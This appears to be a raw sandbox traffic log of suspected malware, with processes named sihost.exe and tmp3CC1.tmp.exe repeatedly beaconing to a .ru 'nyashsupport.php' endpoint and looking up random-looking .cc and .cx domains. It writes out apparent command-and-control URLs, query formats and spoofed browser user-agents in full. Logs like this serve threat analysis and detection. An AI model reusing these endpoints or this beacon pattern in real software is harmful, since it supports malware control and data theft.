http://81888.cllt.nyashteam.ru/nyashsupport.php?6lmn95Ih40DNSXBOMq=luiuBcOoc&Pm01bU4CaRtb6bbIlfLkiUcHVxX0kK=RqkpONW0DGLvZfJyHT30td2Y&Jtfo6EbPfcvWwN4PoHdWiDlM8QhrT=xxL&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&6lmn95Ih40DNSXBOMq=luiuBcOoc&Pm01bU4CaRtb6bbIlfLkiUcHVxX0kK=RqkpONW0DGLvZfJyHT30td2Y&Jtfo6EbPfcvWwN4PoHdWiDlM8QhrT=xxL

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?6lmn95Ih40DNSXBOMq=luiuBcOoc&Pm01bU4CaRtb6bbIlfLkiUcHVxX0kK=RqkpONW0DGLvZfJyHT30td2Y&Jtfo6EbPfcvWwN4PoHdWiDlM8QhrT=xxL&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&6lmn95Ih40DNSXBOMq=luiuBcOoc&Pm01bU4CaRtb6bbIlfLkiUcHVxX0kK=RqkpONW0DGLvZfJyHT30td2Y&Jtfo6EbPfcvWwN4PoHdWiDlM8QhrT=xxL HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=biJlpxos%2BDtsof9fVKYE1y4ToUoTZxulqLoLnK0yJJWvjCgPstpEGN82%2B1NUIPum5mPStpnuTdeWIif9i1QQIiABhhF49RZjgaIwWYeg4ITN42iIrubvo2xBC1G1SQ%2F%2BdSKUwTCpZZ45jA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2084fa6966beb9-LHR
alt-svc: h3=":443"; ma=86400
DNS

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

IN A

Response
DNS

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

IN A

Response
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?OrCLPGqKyR6IF=dkKv56QjE4YwEDXh3wylSQqkfgPikoR&93fHEAS5HpmIxcBmxRYJTdrN4kQZr=8ZmexLiPc2e3dmnixCemvTQ&kgMSNe=3NarMfTp0EiyfpaAEjWwO4F6&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&OrCLPGqKyR6IF=dkKv56QjE4YwEDXh3wylSQqkfgPikoR&93fHEAS5HpmIxcBmxRYJTdrN4kQZr=8ZmexLiPc2e3dmnixCemvTQ&kgMSNe=3NarMfTp0EiyfpaAEjWwO4F6

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?OrCLPGqKyR6IF=dkKv56QjE4YwEDXh3wylSQqkfgPikoR&93fHEAS5HpmIxcBmxRYJTdrN4kQZr=8ZmexLiPc2e3dmnixCemvTQ&kgMSNe=3NarMfTp0EiyfpaAEjWwO4F6&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&OrCLPGqKyR6IF=dkKv56QjE4YwEDXh3wylSQqkfgPikoR&93fHEAS5HpmIxcBmxRYJTdrN4kQZr=8ZmexLiPc2e3dmnixCemvTQ&kgMSNe=3NarMfTp0EiyfpaAEjWwO4F6 HTTP/1.1
Accept: */*
Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RwVwNr6pphvwoYbsTaoa5chV%2B9pi58tqtjpVrnxvg1yv%2FUKiPivwrE9y566TNdsUYyU6FJBBwiJiXvEBrmaWKSWoQgjYPuL73mHnBrbFdFqmq1RyJQNSBubT0Z9B6aA7PQMsqD837UV%2BMw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2085311a246433-LHR
alt-svc: h2=":443"; ma=60
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?OrCLPGqKyR6IF=dkKv56QjE4YwEDXh3wylSQqkfgPikoR&93fHEAS5HpmIxcBmxRYJTdrN4kQZr=8ZmexLiPc2e3dmnixCemvTQ&kgMSNe=3NarMfTp0EiyfpaAEjWwO4F6&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&OrCLPGqKyR6IF=dkKv56QjE4YwEDXh3wylSQqkfgPikoR&93fHEAS5HpmIxcBmxRYJTdrN4kQZr=8ZmexLiPc2e3dmnixCemvTQ&kgMSNe=3NarMfTp0EiyfpaAEjWwO4F6

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?OrCLPGqKyR6IF=dkKv56QjE4YwEDXh3wylSQqkfgPikoR&93fHEAS5HpmIxcBmxRYJTdrN4kQZr=8ZmexLiPc2e3dmnixCemvTQ&kgMSNe=3NarMfTp0EiyfpaAEjWwO4F6&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&OrCLPGqKyR6IF=dkKv56QjE4YwEDXh3wylSQqkfgPikoR&93fHEAS5HpmIxcBmxRYJTdrN4kQZr=8ZmexLiPc2e3dmnixCemvTQ&kgMSNe=3NarMfTp0EiyfpaAEjWwO4F6 HTTP/1.1
Accept: */*
Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UybzL8devMC8Mtlt5fWy%2FSd9TvOTzZJVm5aqTJfRenSRr7WZdcDRWtnceHJxujXDEIZKPflFESm5WqF7eOxUOKSt%2FRB2sFv6RMFp8BdeqW9J%2FOkhBYngB7TChKEnLG2u7Yk6Prf0MrzIXw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2085324be36433-LHR
alt-svc: h2=":443"; ma=60
DNS

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

IN A

Response
DNS

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

IN A

Response
DNS

73.144.22.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.144.22.2.in-addr.arpa

IN PTR

Response

73.144.22.2.in-addr.arpa

IN PTR

a2-22-144-73deploystaticakamaitechnologiescom
DNS

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

IN A

Response
DNS

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

IN A

Response
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?3TUvCXBctguhxKBCAahjw1K2lhqWaDd=QwQUt8En0aCPMPI76&FyQ1NBIcKfqoCpCOQB4qSCW=sVz4pWYtZs7pQZiPMRxi6MYXN89HC&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&3TUvCXBctguhxKBCAahjw1K2lhqWaDd=QwQUt8En0aCPMPI76&FyQ1NBIcKfqoCpCOQB4qSCW=sVz4pWYtZs7pQZiPMRxi6MYXN89HC

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?3TUvCXBctguhxKBCAahjw1K2lhqWaDd=QwQUt8En0aCPMPI76&FyQ1NBIcKfqoCpCOQB4qSCW=sVz4pWYtZs7pQZiPMRxi6MYXN89HC&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&3TUvCXBctguhxKBCAahjw1K2lhqWaDd=QwQUt8En0aCPMPI76&FyQ1NBIcKfqoCpCOQB4qSCW=sVz4pWYtZs7pQZiPMRxi6MYXN89HC HTTP/1.1
Accept: */*
Content-Type: text/csv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8Tbguwo8M%2BRj2XJaY4KzuZ8XUAYbPI61e8j21olW7sZTVzrjp%2FiATkv3e4%2FvszMchnlbLD0QoBIOLrDUpAmMAt7RwxXoZhIDn508ljTv%2FJ8eyBDHkJOzJAITdaSE5kZwbVoRwDHB4Xl5Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2085812f0577a6-LHR
alt-svc: h2=":443"; ma=60
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?3TUvCXBctguhxKBCAahjw1K2lhqWaDd=QwQUt8En0aCPMPI76&FyQ1NBIcKfqoCpCOQB4qSCW=sVz4pWYtZs7pQZiPMRxi6MYXN89HC&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&3TUvCXBctguhxKBCAahjw1K2lhqWaDd=QwQUt8En0aCPMPI76&FyQ1NBIcKfqoCpCOQB4qSCW=sVz4pWYtZs7pQZiPMRxi6MYXN89HC

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?3TUvCXBctguhxKBCAahjw1K2lhqWaDd=QwQUt8En0aCPMPI76&FyQ1NBIcKfqoCpCOQB4qSCW=sVz4pWYtZs7pQZiPMRxi6MYXN89HC&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&3TUvCXBctguhxKBCAahjw1K2lhqWaDd=QwQUt8En0aCPMPI76&FyQ1NBIcKfqoCpCOQB4qSCW=sVz4pWYtZs7pQZiPMRxi6MYXN89HC HTTP/1.1
Accept: */*
Content-Type: text/csv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K9uktMCcW2GzI%2FGs8h4VcljEVmtdIxrZzEvayPnWsLLR2IF9DJoNYlBD8hIqhMHQfw%2FQWPfXxc7%2FJThd%2FhJ68k8W%2F0hnliEnaa%2ByckjRTE2O2pDsI1uG1S2WJQIbT96WKrFxxymFprytGw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c208582a97477a6-LHR
alt-svc: h2=":443"; ma=60
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?ZdhM3=WUulfbfFez0Dost3zuBOtg0E&uaLlC42d9rgfi8NM4=bNmo6XfnwLo&0e=EvAUeb47koBMYRvxCzLY13&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&ZdhM3=WUulfbfFez0Dost3zuBOtg0E&uaLlC42d9rgfi8NM4=bNmo6XfnwLo&0e=EvAUeb47koBMYRvxCzLY13

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?ZdhM3=WUulfbfFez0Dost3zuBOtg0E&uaLlC42d9rgfi8NM4=bNmo6XfnwLo&0e=EvAUeb47koBMYRvxCzLY13&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&ZdhM3=WUulfbfFez0Dost3zuBOtg0E&uaLlC42d9rgfi8NM4=bNmo6XfnwLo&0e=EvAUeb47koBMYRvxCzLY13 HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FkpvDEIJzXoE5g7RiaDDK3oM2HfuXqDffYoxqZY3fzPcMBvd5S1LygHyhfm6IjyUz%2FbkkHG8qWZRk5RNI0lmejubsR06%2Fa1BqC%2FUR40gh9jxj3sAyBtYhfAeZm6bfvC0p%2FsPP29qMTU1OQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2085b28a8a4177-LHR
alt-svc: h2=":443"; ma=60
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?ZdhM3=WUulfbfFez0Dost3zuBOtg0E&uaLlC42d9rgfi8NM4=bNmo6XfnwLo&0e=EvAUeb47koBMYRvxCzLY13&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&ZdhM3=WUulfbfFez0Dost3zuBOtg0E&uaLlC42d9rgfi8NM4=bNmo6XfnwLo&0e=EvAUeb47koBMYRvxCzLY13

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?ZdhM3=WUulfbfFez0Dost3zuBOtg0E&uaLlC42d9rgfi8NM4=bNmo6XfnwLo&0e=EvAUeb47koBMYRvxCzLY13&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&ZdhM3=WUulfbfFez0Dost3zuBOtg0E&uaLlC42d9rgfi8NM4=bNmo6XfnwLo&0e=EvAUeb47koBMYRvxCzLY13 HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kaOvQ%2FhI%2BOWhsZrF5g8JFxG21SWg7WZvHDNhqF3wl8se6JnLOfaIQyUtc3%2Bxb59H48ehPTwjZXn2YB39KX5uWLG3T0XCrK3O%2BmhqxPZhl7g0OUSbR9kha6pLPBC6adcnt4VvyCx%2F80DveQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2085b44d6c4177-LHR
alt-svc: h2=":443"; ma=60
DNS

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

IN A

Response
DNS

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

IN A

Response
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?z3TUg2O=RuMTA1zx7VRaDLBpCy68aEudL8PkGL2&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&z3TUg2O=RuMTA1zx7VRaDLBpCy68aEudL8PkGL2

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?z3TUg2O=RuMTA1zx7VRaDLBpCy68aEudL8PkGL2&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&z3TUg2O=RuMTA1zx7VRaDLBpCy68aEudL8PkGL2 HTTP/1.1
Accept: */*
Content-Type: text/csv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QWO%2BAXNpW7GqX3T4AkmTrRViJrnAX%2BmCNk2EClh%2FuC4%2FFhkVv5vWdJiPiGyXg0MWOKhWo4czeIQGYmCG9tWCe%2BYH1dCTtst7wAR2hyBrkDIG3jLb74Al%2F3tEYcENUMR%2FqxPnuInZpwuSZg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2085e29a3452de-LHR
alt-svc: h3=":443"; ma=86400
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?z3TUg2O=RuMTA1zx7VRaDLBpCy68aEudL8PkGL2&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&z3TUg2O=RuMTA1zx7VRaDLBpCy68aEudL8PkGL2

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?z3TUg2O=RuMTA1zx7VRaDLBpCy68aEudL8PkGL2&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&z3TUg2O=RuMTA1zx7VRaDLBpCy68aEudL8PkGL2 HTTP/1.1
Accept: */*
Content-Type: text/csv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xcx1uSzLFt323rq479nf6dJrByDH8bdc8O%2BnnKX0x4LtZjCuYr39pqGujuahkw3XC5ceJsXp%2FOV0zGDKEjFplyA%2BoHmkIfCLxL08iYUYQS6abpz8Ya6sPQi5HNSKF%2BsEelYIQW1Z4LZhlw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2085e42b8652de-LHR
alt-svc: h3=":443"; ma=86400
DNS

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

IN A

Response
DNS

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

IN A

Response
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o HTTP/1.1
Accept: */*
Content-Type: text/html
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6z1rUAlKiGTgEgQ8giis6UAXG%2Fz5U19XI6Cz3tv4HA12zkrXpfMbn63Aid9vrBwrqoUijWB3NLxIExLTSE6lO4KjUOvWNETCOrQhubM0SyzhCJ0Y8%2B9C3YyEyfEPrt%2FTXIfZGp8Nah%2FV5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2086047932638e-LHR
alt-svc: h3=":443"; ma=86400
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o

sihost.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=gYhhjYhZmN2YTNiV2YlhjZkhjZ3kjYhJGM0IjZ0cDM2MGOilDZjRTO&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o HTTP/1.1
Accept: */*
Content-Type: text/html
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 12 Sep 2024 14:17:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dVoOeqJNfy%2F7F0wHQTADCC4CTU4%2FFCZDByuS1j6gQBW1%2FVm9IE7Fb%2BBbfRAyIUSAhei7YL4yU35PPB2lTbJLoq7HBXsMrFBeFoTdpFR7lOqCeLc9%2F%2Fpqdazn67ioz7CjBrHNmwQjemrpPA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c2086068c22638e-LHR
alt-svc: h3=":443"; ma=86400
DNS

11.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.227.111.52.in-addr.arpa

IN PTR

Response
DNS

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

IN A

Response
DNS

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

IN A

Response
DNS

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc

IN A

Response
DNS

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

tmp3CC1.tmp.exe

Remote address:

8.8.8.8:53

Request

yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx

IN A

Response
GET

